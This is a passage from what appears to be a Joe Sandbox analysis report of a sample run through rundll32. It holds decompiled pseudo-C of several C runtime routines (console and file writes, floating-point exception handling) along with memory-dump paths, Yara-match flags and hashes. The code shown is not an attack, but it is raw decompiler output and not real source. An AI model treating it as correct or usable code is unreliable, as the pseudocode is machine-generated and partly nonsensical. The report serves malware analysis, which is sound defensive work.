                				_t201 = _t200 - 0xfffffff0;
                				_t189 = _t201 + 0x50;
                				if (_t189 == 0) goto 0x535f3b07;
                				 *_t189 = 0xcccc;
                				goto 0x535f39a3;
                				asm("dec eax");
                				_t167 = _t166 & 0xfffffff0;
                				_t69 = E00007FFA7FFA535E7E98(0xffffffffffffff0, _t167);
                				if (0xfffffff0 == 0) goto 0x535f39ab;
                				 *0xfffffff0 = 0xdddd;
                				goto 0x535f39ab;
                				if (0 == 0) goto 0x535f3b07;
                				 *(_t201 + 0x28) = r12d;
                				r9d = __ebx;
                				 *(_t201 + 0x20) = 0;
                				asm("adc eax, 0x87a6");
                				if (0xfffffff0 == 0) goto 0x535f3b07;
                				 *(_t201 + 0x28) =  *(_t201 + 0x28) & 0x00000000;
                				r9d = __esi;
                				 *(_t201 + 0x20) =  *(_t201 + 0x20) & 0x00000000;
                				asm("adc eax, 0x877f");
                				if (0xfffffff0 == 0) goto 0x535f3b07;
                				_t209 = _t69 + _t69;
                				asm("dec eax");
                				if ((_t209 + 0x00000010 & _t167) == 0) goto 0x535f3a92;
                				_t168 = _t209 + 0x10;
                				asm("dec eax");
                				if ((0xffffffffffffff0 & _t168) - 0x400 > 0) goto 0x535f3a70;
                				asm("dec eax");
                				_t169 = _t168 & _t209 + 0x00000010;
                				if ((_t168 & _t209 + 0x00000010) + 0xf - (_t168 & _t209 + 0x00000010) > 0) goto 0x535f3a4e;
                				E00007FFA7FFA535F54B0(_t78, 0xffffffffffffff0, _t168 & _t209 + 0x00000010, _t209 + 0x10, _t209, _t213, _t214);
                				_t202 = _t201 - 0xfffffff0;
                				_t157 = _t202 + 0x50;
                				if (_t157 == 0) goto 0x535f3aed;
                				 *_t157 = 0xcccc;
                				goto 0x535f3a8c;
                				asm("dec eax");
                				E00007FFA7FFA535E7E98(0xffffffffffffff0, _t169 & 0xfffffff0);
                				if (0xfffffff0 == 0) goto 0x535f3a94;
                				 *0xfffffff0 = 0xdddd;
                				goto 0x535f3a94;
                				if (0 == 0) goto 0x535f3aed;
                				 *((intOrPtr*)(_t202 + 0x28)) = r15d;
                				r9d = __esi;
                				 *((long long*)(_t202 + 0x20)) = 0;
                				asm("adc eax, 0x86c1");
                				if (0xffffffffffffff0 == 0) goto 0x535f3aed;
                				 *(_t202 + 0x40) =  *(_t202 + 0x40) & 0x00000000;
                				r9d = r12d;
                				 *(_t202 + 0x38) =  *(_t202 + 0x38) & 0x00000000;
                				 *(_t202 + 0x30) =  *(_t202 + 0x30) & 0x00000000;
                				 *((intOrPtr*)(_t202 + 0x28)) = r15d;
                				 *((long long*)(_t202 + 0x20)) = 0;
                				E00007FFA7FFA535ED8B8(_t65 %  *(_t194 + 7), 0xffffffffffffff0, 0,  *((intOrPtr*)(_t198 + 8)), 0, _t194, _t198, 0);
                				goto 0x535f3aef;
                				if (0 == 0) goto 0x535f3b09;
                				if ( *0xFFFFFFFFFFFFFFF0 != 0xdddd) goto 0x535f3b09;
                				E00007FFA7FFA535E7E58(0xffffffffffffff0, 0xfffffffffffffff0);
                				goto 0x535f3b09;
                				if (0 == 0) goto 0x535f3b1f;
                				if ( *((long long*)(0xfffffffffffffff0)) != 0xdddd) goto 0x535f3b1f;
                				_t74 = E00007FFA7FFA535E7E58(0xffffffffffffff0, 0xfffffffffffffff0);
                				E00007FFA7FFA535F51E0();
                				return _t74;
                			}

                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6a647bc2f0d06cadd2b7bd3f3bba938a5c688e9845753ee657085d7cf8953cb4
                • Instruction ID: 972d0482d3329e393c88d519c077d3490ce639df4d23031a2b85a65582a6c7b7
                • Opcode Fuzzy Hash: 6a647bc2f0d06cadd2b7bd3f3bba938a5c688e9845753ee657085d7cf8953cb4
                • Instruction Fuzzy Hash: B5A1D5A2B29B824DFB218BA1945037D669BAF82BA4F4C9631DB5D277C5DF3CE444C300
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 659ba7b49373035babac36c5c08596b7598a4fdf9888a41ab73fbad75e115d26
                • Instruction ID: efee9d7ee7096915a7a9e74d9ffd865ee4ed86624a2cffa40641849a8b6a5ee1
                • Opcode Fuzzy Hash: 659ba7b49373035babac36c5c08596b7598a4fdf9888a41ab73fbad75e115d26
                • Instruction Fuzzy Hash: F1A1F673706BA0C6FF708F6194483EAA691FFA1BA4F6846659E59077CDDB38E444C320
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 48%
                			E00007FFA7FFA535F4378(signed long long __ecx, void* __edx, void* __esi, void* __ebp, void* __rax, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
                				char _v64;
                				signed long long _v72;
                				void* _v84;
                				unsigned int _v88;
                				void* _v96;
                				long long _v100;
                				signed int _v104;
                				signed int _v120;
                				void* __rsi;
                				void* __rbp;
                				void* _t74;
                				void* _t75;
                				void* _t94;
                				intOrPtr _t95;
                				void* _t96;
                				void* _t102;
                				void* _t107;
                				void* _t128;
                				signed long long _t142;
                				intOrPtr _t144;
                				long long* _t152;
                				signed long long* _t154;
                				intOrPtr _t162;
                				signed short* _t183;
                				void* _t185;
                				void* _t188;
                				signed long long _t195;
                				void* _t196;
                				signed long long _t198;
                				signed long long _t199;
                				signed long long _t201;
                				void* _t202;
                				signed short* _t203;
                
                				_t193 = __r9;
                				_t157 = __rbx;
                				_t102 = __edx;
                				_a32 = __rbx;
                				r15d = r8d;
                				_t195 = __ecx;
                				_t183 = __rdx;
                				if (r8d != 0) goto 0x535f43a6;
                				goto 0x535f4641;
                				if (__rdx != 0) goto 0x535f43ca;
                				E00007FFA7FFA535E8360(0);
                				 *((long long*)(0)) = 0;
                				_t74 = E00007FFA7FFA535E8380(0);
                				 *((long long*)(0)) = 0x16;
                				_t75 = E00007FFA7FFA535E8260(_t74);
                				goto 0x535f4641;
                				r14d = r14d & 0x0000003f;
                				_t198 = _t195 >> 6;
                				_t201 = _t195 << 6;
                				_v72 = _t198;
                				_t162 =  *((intOrPtr*)(0x53754e50 + _t198 * 8));
                				_t95 =  *((intOrPtr*)(_t162 + _t201 + 0x39));
                				if (_t75 - 1 > 0) goto 0x535f4400;
                				_t142 =  !(__rbx - 1);
                				if ((r15d & 0x00000001) == 0) goto 0x535f43ab;
                				if (( *(_t162 + _t201 + 0x38) & 0x00000020) == 0) goto 0x535f4416;
                				r8d = 2;
                				E00007FFA7FFA535F4CA8(r12d, _t102, _t107, _t142, __rbx, _t162, 0, __rdx, _t188);
                				_v88 = 0;
                				E00007FFA7FFA535E4A88(r12d, _t142);
                				if (_t142 == 0) goto 0x535f452b;
                				_t144 =  *((intOrPtr*)(0x53754e50 + _t198 * 8));
                				if (( *(0x53754e50 + _t201 + 0x38) & 0x00000080) == 0) goto 0x535f452b;
                				E00007FFA7FFA535E8A30(_t144, _t157, _t162, 0, __r9);
                				if ( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0x90)) + 0x138)) != 0) goto 0x535f446c;
                				if ( *((intOrPtr*)( *((intOrPtr*)(0x53754e50 + _t198 * 8)) + _t201 + 0x39)) == dil) goto 0x535f452b;
                				GetConsoleMode(??, ??);
                				if (0x53754e50 == 0) goto 0x535f452b;
                				if (_t95 == 0) goto 0x535f450d;
                				_t96 = _t95 - 1;
                				if (_t96 - 1 > 0) goto 0x535f45c8;
                				_v104 = _v104 & 0;
                				_t196 = _t183 + _t202;
                				_t203 = _t183;
                				_v100 = 0;
                				if (_t183 - _t196 >= 0) goto 0x535f45be;
                				r13d =  *_t203 & 0x0000ffff;
                				if (E00007FFA7FFA535F4DA0(r13w & 0xffffffff) != r13w) goto 0x535f44fb;
                				_v100 = 2;
                				if (r13w != 0xa) goto 0x535f44f0;
                				r13d = 0xd;
                				if (E00007FFA7FFA535F4DA0(r13d) != r13w) goto 0x535f44fb;
                				_v100 = 2;
                				if ( &(_t203[1]) - _t196 >= 0) goto 0x535f4504;
                				goto 0x535f44b5;
                				GetLastError();
                				_v104 = 0x53754e50;
                				_t199 = _v72;
                				goto 0x535f45be;
                				r9d = r15d;
                				E00007FFA7FFA535F3CEC(r12d, _t107, __esi, 3,  &_v104,  &_v64, _t183, _t193);
                				asm("movsd xmm0, [eax]");
                				goto 0x535f45c3;
                				if (( *( *((intOrPtr*)(0x53754e50 + _t199 * 8)) + _t201 + 0x38) & 0x00000080) == 0) goto 0x535f458b;
                				_t128 = _t96;
                				if (_t128 == 0) goto 0x535f4577;
                				if (_t128 == 0) goto 0x535f4563;
                				if (_t96 - 1 != 1) goto 0x535f45c8;
                				r9d = r15d;
                				E00007FFA7FFA535F3FFC(_t96, r12d, 0x53754e50, 3,  &_v104, _t185, _t183);
                				goto 0x535f451f;
                				r9d = r15d;
                				E00007FFA7FFA535F4118(r12d, _t107, 0x53754e50, 3,  &_v104, _t185, _t183);
                				goto 0x535f451f;
                				r9d = r15d;
                				E00007FFA7FFA535F3EF4(r12d, _t107, 0x53754e50, 3,  &_v104, _t185, _t183);
                				goto 0x535f451f;
                				_v104 = _v104 &  *0x7FFA53754E58;
                				_v120 = _v120 & 0;
                				r8d = r15d;
                				_v100 = 0;
                				WriteFile(??, ??, ??, ??, ??);
                				if (0 != 0) goto 0x535f45bb;
                				GetLastError();
                				_v104 = 0;
                				asm("movsd xmm0, [ebp-0x30]");
                				asm("movsd [ebp-0x20], xmm0");
                				if (_v88 >> 0x20 != 0) goto 0x535f463c;
                				_t152 = _v88;
                				if (_t152 == 0) goto 0x535f4608;
                				if (_t152 != 5) goto 0x535f45fb;
                				E00007FFA7FFA535E8380(_t152);
                				 *_t152 = 9;
                				E00007FFA7FFA535E8360(_t152);
                				 *_t152 = 5;
                				goto 0x535f43c2;
                				E00007FFA7FFA535E8310(r13d, _t152, 3);
                				goto 0x535f43c2;
                				_t154 =  *((intOrPtr*)(0x53754e50 + _t199 * 8));
                				if (( *(0x53754e50 + _t201 + 0x38) & 0x00000040) == 0) goto 0x535f4624;
                				if ( *_t183 == 0x1a) goto 0x535f439f;
                				E00007FFA7FFA535E8380(_t154);
                				 *0x53754e50 = 0x1c;
                				_t94 = E00007FFA7FFA535E8360(_t154);
                				 *_t154 =  *_t154 & 0x00000000;
                				goto 0x535f43c2;
                				return _t94;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 25528e04e11f271ec241f921196ce4d7b5384367a7b14c3a2b7fb6a4004ca7d6
                • Instruction ID: e79e2f86366f569ae94da9adcb03faac9333a13f018f85a3e66852ab38498644
                • Opcode Fuzzy Hash: 25528e04e11f271ec241f921196ce4d7b5384367a7b14c3a2b7fb6a4004ca7d6
                • Instruction Fuzzy Hash: 028192E2E38F124DF712AB65D4406BD26AABBC6B54F48A135DE0E23695CF3CE465C310
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 44%
                			E00000215215206178D0(signed long long __ecx, void* __edx, void* __esi, intOrPtr* __rax, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
                				char _v64;
                				signed long long _v72;
                				intOrPtr _v84;
                				unsigned int _v88;
                				intOrPtr _v96;
                				long long _v100;
                				signed int _v104;
                				signed int _v120;
                				void* __rbp;
                				void* _t75;
                				long _t94;
                				unsigned int _t95;
                				intOrPtr _t103;
                				signed int _t124;
                				intOrPtr _t157;
                				unsigned long long _t163;
                				signed int* _t165;
                				intOrPtr _t168;
                				signed short* _t178;
                				unsigned int _t181;
                				signed short* _t182;
                				void* _t184;
                				signed long long _t193;
                				void* _t194;
                				signed long long _t196;
                				signed long long _t197;
                				signed long long _t199;
                				void* _t200;
                				signed short* _t201;
                
                				_t178 = __rdx;
                				_t166 = __rbx;
                				_a32 = __rbx;
                				r15d = r8d;
                				_t193 = __ecx;
                				_t182 = __rdx;
                				if (r8d != 0) goto 0x206178fe;
                				goto 0x20617b99;
                				if (__rdx != 0) goto 0x20617922;
                				E0000021521520603924(__rax);
                				 *__rax = 0;
                				_t75 = E0000021521520603944(__rax);
                				 *__rax = 0x16;
                				E00000215215205FAABC(_t75);
                				goto 0x20617b99;
                				r14d = r14d & 0x0000003f;
                				_t196 = _t193 >> 6;
                				_t199 = _t193 << 6;
                				_v72 = _t196;
                				_t168 =  *((intOrPtr*)(0x20682b40 + _t196 * 8));
                				_t103 =  *((intOrPtr*)(_t168 + _t199 + 0x39));
                				if (__rbx - 1 - 1 > 0) goto 0x20617958;
                				if (( !r15d & 0x00000001) == 0) goto 0x20617903;
                				if (( *(_t168 + _t199 + 0x38) & 0x00000020) == 0) goto 0x2061796e;
                				_t14 = _t178 + 2; // 0x2
                				r8d = _t14;
                				E00000215215206190C0();
                				_v88 = _t181;
                				if (E0000021521520616880(r12d, 0, 0x20682b40) == 0) goto 0x20617a83;
                				_t157 =  *((intOrPtr*)(0x20682b40 + _t196 * 8));
                				if (( *(0x20682b40 + _t199 + 0x38) & 0x00000080) == 0) goto 0x20617a83;
                				E000002152152060C334(_t157, __rbx, _t168, _t178, __r9);
                				if ( *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x90)) + 0x138)) != _t181) goto 0x206179c4;
                				if ( *((intOrPtr*)( *((intOrPtr*)(0x20682b40 + _t196 * 8)) + _t199 + 0x39)) == dil) goto 0x20617a83;
                				if (GetConsoleMode(??, ??) == 0) goto 0x20617a83;
                				if (_t103 == 0) goto 0x20617a65;
                				if (_t103 - 1 - 1 > 0) goto 0x20617b20;
                				_v104 = _v104 & 0;
                				_t194 = _t182 + _t200;
                				_t201 = _t182;
                				_v100 = 0;
                				if (_t182 - _t194 >= 0) goto 0x20617b16;
                				r13d =  *_t201 & 0x0000ffff;
                				if (E0000021521520619628(r13w & 0xffffffff) != r13w) goto 0x20617a53;
                				_v100 = 2;
                				if (r13w != 0xa) goto 0x20617a48;
                				r13d = 0xd;
                				if (E0000021521520619628(r13d) != r13w) goto 0x20617a53;
                				_v100 = 2;
                				if ( &(_t201[1]) - _t194 >= 0) goto 0x20617a5c;
                				goto 0x20617a0d;
                				_v104 = GetLastError();
                				_t197 = _v72;
                				goto 0x20617b16;
                				r9d = r15d;
                				E0000021521520617244(r12d, 1, __esi, _t166,  &_v104,  &_v64, _t182);
                				asm("movsd xmm0, [eax]");
                				_t124 =  *0x21520682B48;
                				goto 0x20617b1b;
                				if (( *( *((intOrPtr*)(0x20682b40 + _t197 * 8)) + _t199 + 0x38) & 0x00000080) == 0) goto 0x20617ae3;
                				if (3 == 0) goto 0x20617acf;
                				if (3 == 0) goto 0x20617abb;
                				if (2 != 1) goto 0x20617b20;
                				r9d = r15d;
                				E0000021521520617554(3, r12d, 0x20682b40, _t166,  &_v104, _t184, _t182);
                				goto 0x20617a77;
                				r9d = r15d;
                				E0000021521520617670(r12d, _t124, 0x20682b40, _t166,  &_v104, _t184, _t182);
                				goto 0x20617a77;
                				r9d = r15d;
                				E000002152152061744C(r12d, _t124, 0x20682b40, _t166,  &_v104, _t184, _t182);
                				goto 0x20617a77;
                				_v104 = _v104 & _t124;
                				_v120 = _v120 & 0x20682b40;
                				r8d = r15d;
                				_v100 = 0x20682b40;
                				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x20617b13;
                				_t94 = GetLastError();
                				_v104 = _t94;
                				asm("movsd xmm0, [ebp-0x30]");
                				asm("movsd [ebp-0x20], xmm0");
                				_t163 = _v88 >> 0x20;
                				if (_t94 != 0) goto 0x20617b94;
                				_t95 = _v88;
                				if (_t95 == 0) goto 0x20617b60;
                				if (_t95 != 5) goto 0x20617b53;
                				E0000021521520603944(_t163);
                				 *_t163 = 9;
                				E0000021521520603924(_t163);
                				 *_t163 = 5;
                				goto 0x2061791a;
                				E00000215215206038D4(_v88, _t163, _t166);
                				goto 0x2061791a;
                				_t165 =  *((intOrPtr*)(0x20682b40 + _t197 * 8));
                				if (( *(0x20682b40 + _t199 + 0x38) & 0x00000040) == 0) goto 0x20617b7c;
                				if ( *_t182 == 0x1a) goto 0x206178f7;
                				E0000021521520603944(_t165);
                				 *0x20682b40 = 0x1c;
                				E0000021521520603924(_t165);
                				 *_t165 =  *_t165 & 0x00000000;
                				goto 0x2061791a;
                				return _v84 - _v96;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 52d99cb5615afe62c5ecdb2a2b3b8332668bb0552d9714908df8974f14046c50
                • Instruction ID: 167f90814dccb2ad2de1ac4f7b6e8b8f9dd09b057f07d105ee0329fc44acfe06
                • Opcode Fuzzy Hash: 52d99cb5615afe62c5ecdb2a2b3b8332668bb0552d9714908df8974f14046c50
                • Instruction Fuzzy Hash: C981CA33712E60C9FB309F2598887EDA7B5BFE4B98F244185DE0A537A9DB34A945C310
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 9a481b7797b83caa62ae56b9bfc09498f8646f626c0c1df2f8e84da70a781739
                • Instruction ID: ddc47afb5f21660ea1829566c097fa29323be1bd51b716aa6a85a46be5e7c1d3
                • Opcode Fuzzy Hash: 9a481b7797b83caa62ae56b9bfc09498f8646f626c0c1df2f8e84da70a781739
                • Instruction Fuzzy Hash: E551D926D2CF5A49F2229F34A45037A626BBFC2351F0CD275DA5E365D4EF3CA445A600
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 23%
                			E00000215215206128A8(signed int __ecx, long long __rbx, signed int __rcx, void* __rdx, signed int __r8, char _a8, long long _a16, unsigned int _a32, unsigned int _a36, signed short _a38) {
                				signed short _t34;
                				unsigned int _t37;
                				unsigned int _t38;
                				signed int _t43;
                				signed int _t44;
                				signed int _t45;
                				signed int _t46;
                				signed int _t47;
                				void* _t55;
                				unsigned int _t56;
                				void* _t63;
                				signed int _t69;
                				signed int _t70;
                				void* _t73;
                				signed int _t74;
                				void* _t75;
                				signed int _t79;
                				signed int _t82;
                				signed long long _t86;
                				void* _t102;
                				void* _t103;
                
                				_a16 = __rbx;
                				r14d = 0;
                				asm("movaps [esp+0x20], xmm6");
                				_t43 = __ecx & 0x0000001f;
                				r12d = __ecx;
                				_t2 = _t103 + 0x10; // 0x10
                				r13d = _t2;
                				if ((__ecx & 0x00000008) == 0) goto 0x206128f1;
                				if (r15b >= 0) goto 0x206128f1;
                				E00000215215206131F4(_t43, __rcx);
                				_t44 = _t43 & 0xfffffff7;
                				goto 0x20612ad1;
                				_t69 = 0x00000004 & r12b;
                				if (_t69 == 0) goto 0x2061290f;
                				asm("dec ecx");
                				if (_t69 >= 0) goto 0x2061290f;
                				E00000215215206131F4(_t44, __rcx);
                				_t45 = _t44 & 0xfffffffb;
                				goto 0x20612ad1;
                				_t70 = dil & r12b;
                				if (_t70 == 0) goto 0x206129cd;
                				asm("dec ecx");
                				if (_t70 >= 0) goto 0x206129cd;
                				E00000215215206131F4(_t45, __rcx);
                				_t86 = __r8 & __rcx;
                				if (_t70 == 0) goto 0x2061299a;
                				if (_t86 == 0x2000) goto 0x20612982;
                				if (_t86 == 0x4000) goto 0x2061296a;
                				_t73 = _t86 - __rcx;
                				if (_t73 != 0) goto 0x206129c5;
                				asm("movsd xmm0, [esi]");
                				asm("comisd xmm0, [0x1e8b2]");
                				asm("movsd xmm0, [0x234a2]");
                				if (_t73 > 0) goto 0x206129c1;
                				goto 0x206129ba;
                				asm("movsd xmm0, [esi]");
                				asm("comisd xmm0, [0x1e89a]");
                				if (_t73 > 0) goto 0x206129a8;
                				asm("movsd xmm0, [0x23488]");
                				goto 0x206129ba;
                				asm("movsd xmm0, [esi]");
                				asm("comisd xmm0, [0x1e882]");
                				if (_t73 <= 0) goto 0x206129b2;
                				asm("movsd xmm0, [0x23470]");
                				goto 0x206129c1;
                				asm("movsd xmm0, [esi]");
                				asm("comisd xmm0, [0x1e86a]");
                				if (_t73 <= 0) goto 0x206129b2;
                				asm("movsd xmm0, [0x23450]");
                				goto 0x206129c1;
                				asm("movsd xmm0, [0x23446]");
                				asm("xorps xmm0, [0x2fd4f]");
                				asm("movsd [esi], xmm0");
                				_t46 = _t45 & 0xfffffffe;
                				goto 0x20612ad1;
                				_t74 = r12b & 0x00000002;
                				if (_t74 == 0) goto 0x20612ad1;
                				asm("dec ecx");
                				if (_t74 >= 0) goto 0x20612ad1;
                				asm("movsd xmm0, [edx]");
                				asm("xorps xmm6, xmm6");
                				_t63 =  !=  ? 1 : r14d;
                				asm("ucomisd xmm0, xmm6");
                				if (_t74 != 0) goto 0x20612a04;
                				if (_t74 != 0) goto 0x20612a04;
                				goto 0x20612ac2;
                				_t34 = E0000021521520612F78(r12b & r13b, _t74,  &_a8);
                				_t55 = _a8 + 0xfffffa00;
                				asm("movsd [esp+0x88], xmm0");
                				_t75 = _t55 - 0xfffffbce;
                				if (_t75 >= 0) goto 0x20612a34;
                				asm("mulsd xmm0, xmm6");
                				goto 0x20612abe;
                				r8d = r14d;
                				asm("comisd xmm6, xmm0");
                				r8b = _t75 > 0;
                				_a38 = _t34 & 0x0000000f | r13w;
                				if (_t55 - 0xfffffc03 >= 0) goto 0x20612aa9;
                				_t37 = _a32;
                				_t56 = _a36;
                				if ((dil & _t37) == 0) goto 0x20612a82;
                				_t66 =  ==  ? 1 : 1;
                				_t38 = _t37 >> 1;
                				_a32 = _t38;
                				_t79 = dil & _t56;
                				if (_t79 == 0) goto 0x20612a9b;
                				asm("bts eax, 0x1f");
                				_a32 = _t38;
                				if (_t79 != 0) goto 0x20612a78;
                				_a36 = _t56 >> 1;
                				asm("movsd xmm0, [esp+0x88]");
                				if (r8d == 0) goto 0x20612abe;
                				asm("xorps xmm0, [0x2fc52]");
                				asm("movsd [esi], xmm0");
                				_t81 =  ==  ? 1 : 1;
                				if (( ==  ? 1 : 1) == 0) goto 0x20612ace;
                				E00000215215206131F4(_t46, _t102);
                				_t47 = _t46 & 0xfffffffd;
                				_t82 = r13b & r12b;
                				if (_t82 == 0) goto 0x20612aea;
                				asm("dec ecx");
                				if (_t82 >= 0) goto 0x20612aea;
                				E00000215215206131F4(_t47, _t102);
                				asm("movaps xmm6, [esp+0x20]");
                				r14b = (_t47 & 0xffffffef) == 0;
                				return r14d;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 509265f950abf2e7e2260dcf5cdcd31c2f65a8f817b08dd6b93b0e5f940dfdf5
                • Instruction ID: 62ddc35c9d206bbebcc2882e6e5f38665633699dd5ce5cfe5f14b1a81515be0e
                • Opcode Fuzzy Hash: 509265f950abf2e7e2260dcf5cdcd31c2f65a8f817b08dd6b93b0e5f940dfdf5
                • Instruction Fuzzy Hash: 8A51D833106E69C5FE369F39A4583EAE260FFF1750F3486919E56263DCDB34A4A18E00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 25%
                			E00007FFA7FFA535F3CEC(signed int __edx, void* __edi, void* __esi, long long __rbx, long long* __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
                				signed long long _v72;
                				char _v80;
                				intOrPtr _v87;
                				char _v88;
                				long long _v96;
                				long long _v104;
                				long long _v108;
                				long long _v112;
                				int _v116;
                				char _v120;
                				signed long long _v128;
                				signed long long _v136;
                				long long _v144;
                				signed int _v152;
                				int _t76;
                				int _t77;
                				long _t80;
                				signed char _t81;
                				signed int _t87;
                				signed long long _t99;
                				intOrPtr _t103;
                				signed int _t104;
                				long long _t106;
                				long long* _t109;
                				intOrPtr _t126;
                				intOrPtr* _t138;
                				signed long long _t141;
                				void* _t143;
                				void* _t151;
                				void* _t152;
                				signed long long _t156;
                
                				_a8 = __rbx;
                				_t99 =  *0x53754140; // 0x3c63485c5c92
                				_v72 = _t99 ^ _t143 - 0x00000080;
                				r12d = r9d;
                				_t156 = __edx >> 6;
                				_t141 = (__edx & 0x0000003f) << 6;
                				_v96 = __r8;
                				_t109 = __rcx;
                				_t152 = _t151 + __r8;
                				_t103 =  *((intOrPtr*)( *((intOrPtr*)(0x53754e50 + _t156 * 8)) + _t141 + 0x28));
                				_v104 = 0x53754e50;
                				GetConsoleCP();
                				_v108 = 0x53754e50;
                				 *__rcx = 0;
                				 *((long long*)(__rcx + 8)) = 0;
                				if (__r8 - _t152 >= 0) goto 0x535f3eca;
                				r13b =  *((intOrPtr*)(__r8));
                				_v120 = __edx;
                				_t126 =  *((intOrPtr*)(0x53754e50 + _t156 * 8));
                				_t81 =  *(_t126 + _t141 + 0x3d);
                				_t87 = _t81 & 0x00000004;
                				if (_t87 == 0) goto 0x535f3d9f;
                				 *(_t126 + _t141 + 0x3d) = _t81 & 0x000000fb;
                				r8d = 2;
                				_v88 =  *((intOrPtr*)(_t126 + _t141 + 0x3e));
                				_v87 = r13b;
                				goto 0x535f3de4;
                				E00007FFA7FFA535ED520(_t81 & 0x000000fb, __edx, _t103, __rcx, __rcx,  &_v88, __r9);
                				if (_t87 == 0) goto 0x535f3ddb;
                				if (__r8 - _t152 >= 0) goto 0x535f3eaa;
                				r8d = 2;
                				E00007FFA7FFA535EFBE0(__edx, _t103,  &_v120);
                				if (0x53754e50 == 0xffffffff) goto 0x535f3eca;
                				goto 0x535f3df6;
                				r8d = 1;
                				E00007FFA7FFA535EFBE0(__edx, _t103,  &_v120);
                				if (_t103 == 0xffffffff) goto 0x535f3eca;
                				_v128 = _v128 & 0x00000000;
                				_t104 =  &_v80;
                				_v136 = _v136 & 0x00000000;
                				r9d = 1;
                				_v144 = 5;
                				_v152 = _t104;
                				_t138 = __r8 + 2;
                				_t76 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                				r14d = _t76;
                				if (_t104 == 0) goto 0x535f3eca;
                				_v152 = _v152 & 0x00000000;
                				r8d = _t76;
                				_t77 = WriteFile(??, ??, ??, ??, ??);
                				if (_t104 == 0) goto 0x535f3ec2;
                				 *((long long*)(_t109 + 4)) =  *((intOrPtr*)(_t109 + 8)) - _v96 + _t138;
                				if (_v112 - r14d < 0) goto 0x535f3eca;
                				if (r13b != 0xa) goto 0x535f3ea2;
                				_v152 = 0;
                				r8d = 1;
                				_v116 = _t77;
                				WriteFile(??, ??, ??, ??, ??);
                				if (0xd == 0) goto 0x535f3ec2;
                				if (_v112 - 1 < 0) goto 0x535f3eca;
